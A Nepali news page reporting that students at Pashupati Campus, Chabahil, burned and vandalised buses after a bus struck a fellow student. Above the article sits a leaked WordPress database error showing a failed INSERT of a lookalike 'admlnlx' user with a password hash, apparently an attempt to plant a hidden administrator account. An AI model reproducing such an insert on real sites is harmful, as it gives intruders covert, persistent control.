WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCyvBJUqGb.5QI1Fs8Z5q7UlrGjw./0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 21:27:27', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, पशुपति क्याम्पस चाबाहिलमा अध्यनरत विद्यार्थीलाई बसले ठक्कर दिएपछि राजधानीको चावहिल क्षेत्र तनावग्रस्त बनेको छ ।
पशुपति क्याम्पसमा अध्ययनरत विद्यार्थी सृष्टि पन्तलाई सोमबार(आज) विहान बा ७ ख ५९३० नम्बरको बसले ठक्कर दिएर घाइते बनाएको थियो ।
बसले ठक्कर दिएपछि आक्रोशित बनेका पशुपति क्याम्पसका विद्यार्थीले बस जलाएका हुन् ।
विद्यार्थीहरुले बा ४ ख ७१०१ नम्बरको बसमा आगजनी गरेका थिए भने बा ३ ख ४४३३ नम्बरको बसमा तोडफोड गरेका छन् ।
आक्रोशित विद्यार्थी र प्रहरीबीच केहीबेर तनावको अवस्थासमेत सिर्जना भएको थियो । घाइते विद्यार्थी पन्तको उपचार भइरहेको प्रहरीले जनाएको छ ।